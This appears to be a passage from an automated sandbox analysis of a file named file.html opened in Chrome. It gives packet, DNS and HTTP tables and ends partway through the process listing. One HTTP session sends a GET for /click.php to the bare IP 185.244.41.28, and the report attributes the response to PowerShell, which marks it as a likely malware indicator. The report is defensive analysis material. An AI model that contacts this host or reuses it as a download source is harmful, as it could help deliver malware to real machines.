                                                                                                                                                                Aug 16, 2021 19:10:35.761446953 CEST53772443192.168.2.3172.217.168.65
                                                                                                                                                                Aug 16, 2021 19:10:35.761478901 CEST44353772172.217.168.65192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:35.761553049 CEST53772443192.168.2.3172.217.168.65
                                                                                                                                                                Aug 16, 2021 19:10:35.762480021 CEST44353772172.217.168.65192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:35.762742043 CEST44353772172.217.168.65192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:35.762790918 CEST44353772172.217.168.65192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:35.762794018 CEST53772443192.168.2.3172.217.168.65
                                                                                                                                                                Aug 16, 2021 19:10:35.762866020 CEST44353772172.217.168.65192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:35.762897015 CEST44353772172.217.168.65192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:35.762918949 CEST53772443192.168.2.3172.217.168.65
                                                                                                                                                                Aug 16, 2021 19:10:35.762939930 CEST44353772172.217.168.65192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:35.762958050 CEST44353772172.217.168.65192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:35.763015985 CEST44353772172.217.168.65192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.095535994 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.095542908 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.115667105 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.115690947 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.115711927 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.115731001 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.156966925 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.160096884 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.160162926 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.160195112 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.160218000 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.160254955 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.160300970 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.162698984 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.186548948 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.058132887 CEST4972080192.168.2.38.248.117.254
                                                                                                                                                                Aug 16, 2021 19:11:12.087965012 CEST80497208.248.117.254192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.088068962 CEST4972080192.168.2.38.248.117.254
                                                                                                                                                                Aug 16, 2021 19:11:12.121963024 CEST804971993.184.220.29192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.122083902 CEST4971980192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:11:12.714184999 CEST4973080192.168.2.3104.89.41.209
                                                                                                                                                                Aug 16, 2021 19:11:12.714267969 CEST4973180192.168.2.3104.89.41.209
                                                                                                                                                                Aug 16, 2021 19:11:12.714381933 CEST49729443192.168.2.3104.89.26.236
                                                                                                                                                                Aug 16, 2021 19:11:12.714452028 CEST49734443192.168.2.3104.89.26.236
                                                                                                                                                                Aug 16, 2021 19:11:12.742049932 CEST44349729104.89.26.236192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.742060900 CEST44349729104.89.26.236192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.742073059 CEST8049731104.89.41.209192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.742130041 CEST49729443192.168.2.3104.89.26.236
                                                                                                                                                                Aug 16, 2021 19:11:12.742208004 CEST49729443192.168.2.3104.89.26.236
                                                                                                                                                                Aug 16, 2021 19:11:12.742235899 CEST4973180192.168.2.3104.89.41.209
                                                                                                                                                                Aug 16, 2021 19:11:12.743906021 CEST8049730104.89.41.209192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.744407892 CEST4973080192.168.2.3104.89.41.209
                                                                                                                                                                Aug 16, 2021 19:11:12.745642900 CEST44349734104.89.26.236192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.745676994 CEST44349734104.89.26.236192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.745723009 CEST49734443192.168.2.3104.89.26.236
                                                                                                                                                                Aug 16, 2021 19:11:12.745790005 CEST49734443192.168.2.3104.89.26.236
                                                                                                                                                                Aug 16, 2021 19:11:13.054512024 CEST804971893.184.220.29192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:13.054609060 CEST4971880192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:11:14.123467922 CEST804973593.184.220.29192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:14.125287056 CEST4973580192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:11:14.230670929 CEST804974893.184.220.29192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:14.230793953 CEST4974880192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:11:14.344544888 CEST49749443192.168.2.313.107.21.200
                                                                                                                                                                Aug 16, 2021 19:11:14.834599972 CEST49747443192.168.2.3204.79.197.200
                                                                                                                                                                Aug 16, 2021 19:11:14.834882975 CEST4974880192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:11:16.803914070 CEST4434973752.113.195.132192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:18.084757090 CEST4434973652.113.195.132192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:19.264564991 CEST4434971352.113.195.132192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:19.795680046 CEST64780443192.168.2.3172.217.168.13
                                                                                                                                                                Aug 16, 2021 19:11:19.800744057 CEST65369443192.168.2.3172.217.168.46
                                                                                                                                                                Aug 16, 2021 19:11:19.816472054 CEST44364780172.217.168.13192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:19.821006060 CEST44365369172.217.168.46192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:20.895822048 CEST53772443192.168.2.3172.217.168.65
                                                                                                                                                                Aug 16, 2021 19:11:20.915985107 CEST44353772172.217.168.65192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:38.276304960 CEST49722443192.168.2.352.109.88.177
                                                                                                                                                                Aug 16, 2021 19:11:38.277041912 CEST49738443192.168.2.352.109.76.40
                                                                                                                                                                Aug 16, 2021 19:11:44.192277908 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:11:44.212544918 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:01.640845060 CEST4971980192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:12:01.641148090 CEST4971880192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:12:01.641299963 CEST4971580192.168.2.38.248.115.254
                                                                                                                                                                Aug 16, 2021 19:12:01.641500950 CEST4971780192.168.2.38.248.117.254
                                                                                                                                                                Aug 16, 2021 19:12:01.664830923 CEST804971993.184.220.29192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:01.664999962 CEST4971980192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:12:01.665611029 CEST804971893.184.220.29192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:01.665808916 CEST4971880192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:12:01.670324087 CEST80497178.248.117.254192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:01.670522928 CEST4971780192.168.2.38.248.117.254
                                                                                                                                                                Aug 16, 2021 19:12:01.672194958 CEST80497158.248.115.254192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:01.674455881 CEST4971580192.168.2.38.248.115.254
                                                                                                                                                                Aug 16, 2021 19:12:02.375216007 CEST4973580192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:12:02.375408888 CEST4973280192.168.2.38.248.115.254
                                                                                                                                                                Aug 16, 2021 19:12:02.375788927 CEST4973380192.168.2.38.248.115.254
                                                                                                                                                                Aug 16, 2021 19:12:02.399631977 CEST804973593.184.220.29192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:02.399959087 CEST4973580192.168.2.393.184.220.29
                                                                                                                                                                Aug 16, 2021 19:12:02.404791117 CEST80497328.248.115.254192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:02.404926062 CEST4973280192.168.2.38.248.115.254
                                                                                                                                                                Aug 16, 2021 19:12:02.406912088 CEST80497338.248.115.254192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:02.407449007 CEST4973380192.168.2.38.248.115.254
                                                                                                                                                                Aug 16, 2021 19:12:04.821017027 CEST64780443192.168.2.3172.217.168.13
                                                                                                                                                                Aug 16, 2021 19:12:04.826009035 CEST65369443192.168.2.3172.217.168.46
                                                                                                                                                                Aug 16, 2021 19:12:04.841835022 CEST44364780172.217.168.13192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:04.845922947 CEST44365369172.217.168.46192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:05.921067953 CEST53772443192.168.2.3172.217.168.65
                                                                                                                                                                Aug 16, 2021 19:12:05.941032887 CEST44353772172.217.168.65192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:07.670227051 CEST6539880192.168.2.3185.244.41.28
                                                                                                                                                                Aug 16, 2021 19:12:07.738559961 CEST8065398185.244.41.28192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:07.738782883 CEST6539880192.168.2.3185.244.41.28
                                                                                                                                                                Aug 16, 2021 19:12:07.740905046 CEST6539880192.168.2.3185.244.41.28
                                                                                                                                                                Aug 16, 2021 19:12:07.809124947 CEST8065398185.244.41.28192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:08.822601080 CEST8065398185.244.41.28192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:08.822654009 CEST8065398185.244.41.28192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:08.822830915 CEST6539880192.168.2.3185.244.41.28
                                                                                                                                                                Aug 16, 2021 19:12:08.829593897 CEST6539880192.168.2.3185.244.41.28
                                                                                                                                                                Aug 16, 2021 19:12:08.897861958 CEST8065398185.244.41.28192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:29.221142054 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:12:29.241262913 CEST44354477172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:49.846836090 CEST64780443192.168.2.3172.217.168.13
                                                                                                                                                                Aug 16, 2021 19:12:49.850218058 CEST65369443192.168.2.3172.217.168.46
                                                                                                                                                                Aug 16, 2021 19:12:49.871890068 CEST44364780172.217.168.13192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:50.947207928 CEST53772443192.168.2.3172.217.168.65
                                                                                                                                                                Aug 16, 2021 19:12:50.971342087 CEST44353772172.217.168.65192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:53.733292103 CEST4434975013.107.21.200192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:13:14.313951969 CEST54477443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:13:14.333998919 CEST44354477172.217.168.78192.168.2.3

                                                                                                                                                                UDP Packets

                                                                                                                                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                Aug 16, 2021 19:10:35.107531071 CEST53497021.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:35.521699905 CEST6344753192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:35.542895079 CEST53634471.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:36.543579102 CEST6272153192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:36.564141035 CEST53627211.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:42.435148954 CEST6264353192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:10:42.456126928 CEST53626431.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.095175028 CEST50134443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.116264105 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.118098021 CEST50134443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.129044056 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.129113913 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.129167080 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.129220963 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.129759073 CEST50134443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.130050898 CEST50134443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.138849020 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.138868093 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.140398026 CEST50134443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.161247015 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.161277056 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.162314892 CEST50134443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:10:59.186570883 CEST44350134172.217.168.78192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:10:59.188534021 CEST50134443192.168.2.3172.217.168.78
                                                                                                                                                                Aug 16, 2021 19:11:12.784378052 CEST5691453192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:12.804691076 CEST53569141.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:12.899964094 CEST5000653192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:12.920742989 CEST53500061.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:14.023876905 CEST6553253192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:14.163172960 CEST53655321.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:15.921431065 CEST5028553192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:15.942163944 CEST53502851.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:16.388461113 CEST6015253192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:16.408986092 CEST53601521.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:16.764219046 CEST4984553192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:16.785020113 CEST53498451.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:17.526992083 CEST6467253192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:17.548098087 CEST53646721.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:17.721081972 CEST5601653192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:17.742396116 CEST53560161.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:17.935945988 CEST6104453192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:17.956625938 CEST53610441.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:18.652035952 CEST6127153192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:18.672480106 CEST53612711.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:19.159934044 CEST5776953192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:19.180944920 CEST53577691.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:19.596275091 CEST6449253192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:19.617351055 CEST53644921.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:20.438371897 CEST5430753192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:20.458916903 CEST53543071.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:26.957995892 CEST5561953192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:26.978904963 CEST53556191.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:34.411412954 CEST6056653192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:34.426924944 CEST5219153192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:34.432743073 CEST53605661.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:34.447846889 CEST53521911.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:54.722656012 CEST6265553192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:54.743086100 CEST53626551.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:54.809957981 CEST5312053192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:54.831034899 CEST53531201.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:11:58.202316999 CEST6068753192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:11:58.222853899 CEST53606871.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:16.872345924 CEST5105653192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:16.893100977 CEST53510561.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:17.032330990 CEST6114553192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:17.054199934 CEST53611451.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:17.412940979 CEST6243653192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:17.433939934 CEST53624361.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:18.461515903 CEST6493153192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:18.482191086 CEST53649311.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:18.500047922 CEST6445353192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:18.520726919 CEST53644531.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:18.663259029 CEST5724953192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:18.665205002 CEST5996253192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:18.683573008 CEST53572491.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:18.685648918 CEST53599621.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:18.742348909 CEST5972953192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:18.763098955 CEST53597291.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:19.930918932 CEST6435253192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:19.952469110 CEST53643521.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:21.576884985 CEST6323453192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:21.597570896 CEST53632341.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:21.808640003 CEST6359953192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:21.829956055 CEST53635991.1.1.1192.168.2.3
                                                                                                                                                                Aug 16, 2021 19:12:31.798208952 CEST5086553192.168.2.31.1.1.1
                                                                                                                                                                Aug 16, 2021 19:12:31.818866014 CEST53508651.1.1.1192.168.2.3

                                                                                                                                                                DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 16, 2021 19:10:18.734625101 CEST | 192.168.2.3 | 1.1.1.1 | 0x5a04 | Standard query (0) | fa000000064.resources.office.net | A (IP address) | IN (0x0001)
Aug 16, 2021 19:10:18.761244059 CEST | 192.168.2.3 | 1.1.1.1 | 0x95af | Standard query (0) | fa000000068.resources.office.net | A (IP address) | IN (0x0001)
Aug 16, 2021 19:10:19.168190956 CEST | 192.168.2.3 | 1.1.1.1 | 0xf764 | Standard query (0) | fa000000070.resources.office.net | A (IP address) | IN (0x0001)
Aug 16, 2021 19:10:19.175411940 CEST | 192.168.2.3 | 1.1.1.1 | 0xff89 | Standard query (0) | fa000000072.resources.office.net | A (IP address) | IN (0x0001)
Aug 16, 2021 19:10:19.801208019 CEST | 192.168.2.3 | 1.1.1.1 | 0xb40f | Standard query (0) | wa104381125.resources.office.net | A (IP address) | IN (0x0001)
Aug 16, 2021 19:10:34.452843904 CEST | 192.168.2.3 | 1.1.1.1 | 0xb80b | Standard query (0) | clients2.google.com | A (IP address) | IN (0x0001)
Aug 16, 2021 19:10:34.453860998 CEST | 192.168.2.3 | 1.1.1.1 | 0xe975 | Standard query (0) | s7d9.scene7.com | A (IP address) | IN (0x0001)
Aug 16, 2021 19:10:34.458116055 CEST | 192.168.2.3 | 1.1.1.1 | 0xde37 | Standard query (0) | accounts.google.com | A (IP address) | IN (0x0001)
Aug 16, 2021 19:10:35.086837053 CEST | 192.168.2.3 | 1.1.1.1 | 0x1a8f | Standard query (0) | s7d9.scene7.com | A (IP address) | IN (0x0001)
Aug 16, 2021 19:10:35.521699905 CEST | 192.168.2.3 | 1.1.1.1 | 0x1417 | Standard query (0) | clients2.googleusercontent.com | A (IP address) | IN (0x0001)
Aug 16, 2021 19:10:36.543579102 CEST | 192.168.2.3 | 1.1.1.1 | 0xd403 | Standard query (0) | sb-ssl.google.com | A (IP address) | IN (0x0001)
Aug 16, 2021 19:12:18.665205002 CEST | 192.168.2.3 | 1.1.1.1 | 0x3c22 | Standard query (0) | g.live.com | A (IP address) | IN (0x0001)
Aug 16, 2021 19:12:21.576884985 CEST | 192.168.2.3 | 1.1.1.1 | 0x55ee | Standard query (0) | g.live.com | A (IP address) | IN (0x0001)

                                                                                                                                                                DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Aug 16, 2021 19:10:18.799119949 CEST | 1.1.1.1 | 192.168.2.3 | 0x5a04 | No error (0) | fa000000064.resources.office.net | resources.office.net.edgekey.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 16, 2021 19:10:18.825979948 CEST | 1.1.1.1 | 192.168.2.3 | 0x95af | No error (0) | fa000000068.resources.office.net | resources.office.net.edgekey.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 16, 2021 19:10:19.194068909 CEST | 1.1.1.1 | 192.168.2.3 | 0xf764 | No error (0) | fa000000070.resources.office.net | resources.office.net.edgekey.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 16, 2021 19:10:19.364707947 CEST | 1.1.1.1 | 192.168.2.3 | 0xff89 | No error (0) | fa000000072.resources.office.net | resources.office.net.edgekey.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 16, 2021 19:10:19.870716095 CEST | 1.1.1.1 | 192.168.2.3 | 0xb40f | No error (0) | wa104381125.resources.office.net | resources.office.net.edgekey.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 16, 2021 19:10:24.673111916 CEST | 1.1.1.1 | 192.168.2.3 | 0xc704 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 16, 2021 19:10:24.953073025 CEST | 1.1.1.1 | 192.168.2.3 | 0x6ded | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 16, 2021 19:10:25.279184103 CEST | 1.1.1.1 | 192.168.2.3 | 0x610c | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 16, 2021 19:10:25.580719948 CEST | 1.1.1.1 | 192.168.2.3 | 0xef92 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 16, 2021 19:10:34.473799944 CEST | 1.1.1.1 | 192.168.2.3 | 0xb80b | No error (0) | clients2.google.com | clients.l.google.com |  | CNAME (Canonical name) | IN (0x0001)
Aug 16, 2021 19:10:34.473799944 CEST | 1.1.1.1 | 192.168.2.3 | 0xb80b | No error (0) | clients.l.google.com |  | 172.217.168.46 | A (IP address) | IN (0x0001)
Aug 16, 2021 19:10:34.478817940 CEST | 1.1.1.1 | 192.168.2.3 | 0xde37 | No error (0) | accounts.google.com |  | 172.217.168.13 | A (IP address) | IN (0x0001)
Aug 16, 2021 19:10:34.552921057 CEST | 1.1.1.1 | 192.168.2.3 | 0xe975 | No error (0) | s7d9.scene7.com | wildcard.scene7.com.edgekey.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 16, 2021 19:10:35.107531071 CEST | 1.1.1.1 | 192.168.2.3 | 0x1a8f | No error (0) | s7d9.scene7.com | wildcard.scene7.com.edgekey.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 16, 2021 19:10:35.542895079 CEST | 1.1.1.1 | 192.168.2.3 | 0x1417 | No error (0) | clients2.googleusercontent.com | googlehosted.l.googleusercontent.com |  | CNAME (Canonical name) | IN (0x0001)
Aug 16, 2021 19:10:35.542895079 CEST | 1.1.1.1 | 192.168.2.3 | 0x1417 | No error (0) | googlehosted.l.googleusercontent.com |  | 172.217.168.65 | A (IP address) | IN (0x0001)
Aug 16, 2021 19:10:36.564141035 CEST | 1.1.1.1 | 192.168.2.3 | 0xd403 | No error (0) | sb-ssl.google.com | sb-ssl.l.google.com |  | CNAME (Canonical name) | IN (0x0001)
Aug 16, 2021 19:10:36.564141035 CEST | 1.1.1.1 | 192.168.2.3 | 0xd403 | No error (0) | sb-ssl.l.google.com |  | 172.217.168.78 | A (IP address) | IN (0x0001)
Aug 16, 2021 19:12:18.685648918 CEST | 1.1.1.1 | 192.168.2.3 | 0x3c22 | No error (0) | g.live.com | g.msn.com |  | CNAME (Canonical name) | IN (0x0001)
Aug 16, 2021 19:12:18.685648918 CEST | 1.1.1.1 | 192.168.2.3 | 0x3c22 | No error (0) | g.msn.com | g-msn-com-nsatc.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001)
Aug 16, 2021 19:12:21.597570896 CEST | 1.1.1.1 | 192.168.2.3 | 0x55ee | No error (0) | g.live.com | g.msn.com |  | CNAME (Canonical name) | IN (0x0001)
Aug 16, 2021 19:12:21.597570896 CEST | 1.1.1.1 | 192.168.2.3 | 0x55ee | No error (0) | g.msn.com | g-msn-com-nsatc.trafficmanager.net |  | CNAME (Canonical name) | IN (0x0001)

                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                • 185.244.41.28

                                                                                                                                                                HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 65398 | 185.244.41.28 | 80 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | kBytes transferred | Direction | Data
Aug 16, 2021 19:12:07.740905046 CEST | 34564 | OUT | GET /click.php HTTP/1.1
Host: 185.244.41.28
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 185.244.41.28 | 80 | 192.168.2.3 | 65398 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | kBytes transferred | Direction | Data
Aug 16, 2021 19:12:08.822601080 CEST | 34565 | IN | HTTP/1.0 404 not found
Date: Mon, 16 Aug 2021 17:12:07 GMT
Server: Apache/2.4.38 (Debian)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


                                                                                                                                                                System Behavior

                                                                                                                                                                General

                                                                                                                                                                Start time:19:10:28
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation --single-argument C:\Users\user\Desktop\file.html
                                                                                                                                                                Imagebase:0x7ff6ba3f0000
                                                                                                                                                                File size:2438312 bytes
                                                                                                                                                                MD5 hash:74859601FB4BEEA84B40D874CCB56CAB
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:19:10:30
                                                                                                                                                                Start date:16/08/2021
                                                                                                                                                                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                Wow64 process (32bit):false
